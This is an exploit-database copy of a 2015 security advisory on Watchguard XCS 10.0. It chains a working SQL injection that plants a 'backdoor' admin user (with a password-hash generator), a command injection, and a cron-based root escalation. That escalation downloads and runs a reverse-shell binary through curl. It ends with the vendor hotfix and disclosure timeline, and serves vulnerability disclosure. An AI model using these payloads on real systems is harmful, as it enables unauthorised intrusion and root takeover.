Watchguard XCS 10.0 - Multiple Vulnerabilities

2015-07-02T00:00:00
ID 1337DAY-ID-23815
Type zdt
Reporter Security-Assessment
Modified 2015-07-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Watchguard XCS Multiple Vulnerabilities
Affected versions: Watchguard XCS <=10.0
 
PDF:
http://www.security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf
 
+-----------+
|Description|
+-----------+
The Watchguard XCS virtual appliance contains a number of
vulnerabilities, including unauthenticated SQL injection, command
execution and privilege escalation. By combining these vulnerabilities,
an attacker may remotely obtain root privileges on the underlying host.
 
+------------+
|Exploitation|
+------------+
==SQL Injection==
Unauthenticated SQL injection is possible through the “sid” cookie
parameter in the Watchguard XCS web interface due to a PHP script that
insecurely constructs an SQL query using that value. Stacked queries are
possible, and allow insertion of a backdoor web interface user into the
database. The following POC shows the insertion of a backdoor user, and
a python snippet that can be used to construct the Watchguard XCS
specific password hashes.
 
[SQLi POC]
GET /borderpost/imp/compose.php3 HTTP/1.1
Host: [HOST]
Cookie: sid=1%3BINSERT INTO sds_users (self, login, password, org,
priv_level, quota, disk_usage) VALUES(99, 'backdoor',
'0b75e2443d3c813d91ac5b91106a70ad', 0, 'server_admin', 0, 0)--
 
 
[Python Password Hash Generator]
import hashlib
def gen_hash(pass_clear):
  PRE_SALT = "BorderWare "
  POST_SALT = " some other random (9) stuff"
  t1 = hashlib.md5(PRE_SALT + pass_clear + POST_SALT).hexdigest()
  t2 = hashlib.md5(pass_clear + t1).hexdigest()
  return t2
   
print gen_hash("backdoor")
 
 
==Command Injection==
The web interface of XCS contains a command injection vulnerability,
allowing an authenticated web application user to execute system
commands as the "nobody" user. The vulnerability is in the id parameter
of the "mailqueue.spl" page.
[POC]
GET /ADMIN/mailqueue.spl?f=dnld&id=;id;uname%20-a
Host: [HOST]
Cookie: [VALID COOKIE]
 
 
==Privilege Escalation==
Privilege Escalation
There are multiple methods to escalate privileges to root after
obtaining a shell. The "FixCorruptMail" script exploit is shown below,
an additional method is detailed in the accompanying PDF.  Privilege
escalation is possible by exploiting the /usr/local/bin/FixCorruptMail
script when it is called by root's crontab every three minutes. This
script reads a file “badqids” from the /var/tmp directory, and
constructs a shell command using some of the contents.
 
[POC]
touch /tmp/dummyfile
/usr/local/sbin/curl -s http://[REVERSE_SHELL.elf] -o /tmp/revshell
chmod +x /tmp/revshell
echo "../../../../../../tmp/dummyfile;/tmp/revshell" > /var/tmp/badqids
 
The executable "/tmp/revshell" will be executed within three minutes by
the root user.
 
+----------+
| Solution |
+----------+
Apply the relevant XCS security hotfix (Build 150522) as provided by
Watchguard.
 
+-------------------+
|Disclosure Timeline|
+-------------------+
12/05/2015 - Email sent to confirm vendor security contact address is valid.
13/05/2015 - Response from vendor confirming address is valid.
13/05/2015 - Sent advisory through to vendor.
13/05/2015 - Vendor confirms receipt of advisory.
27/05/2015 - Vendor sends update on fixes, states a release will be
published shortly.
09/06/2015 - Security hotfixes released for Watchguard XCS v10.0 and v9.2.
29/06/2015 - Public advisory release.

#  0day.today [2018-04-02]  #